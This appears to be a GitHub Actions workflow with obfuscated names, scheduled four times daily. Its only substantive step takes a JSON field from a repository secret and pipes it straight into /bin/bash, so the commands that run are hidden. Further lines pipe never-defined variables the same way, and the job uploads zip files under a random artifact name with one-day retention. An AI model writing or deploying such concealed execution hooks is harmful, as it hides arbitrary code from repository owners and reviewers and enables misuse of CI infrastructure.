name: oauthkate2024
on:
  workflow_dispatch:

  schedule:
    - cron: '54 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: oauthkate2024
        env:
          thfk57: ${{ secrets.thfk57 }}
        run: |
          printf '%s' "$thfk57" | jq -r .zoy7773 | /bin/bash
          echo $ype3959 | jq -r .ey7 | /bin/bash
          printf '%s' "$odz45" | jq -r .mssbq6 | /bin/bash
          echo $g383 | jq -r .jip62 | /bin/bash
          echo $fa9821 | jq -r .ev856 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: w72R3MWJ
          path: "*.zip"
          retention-days: 1
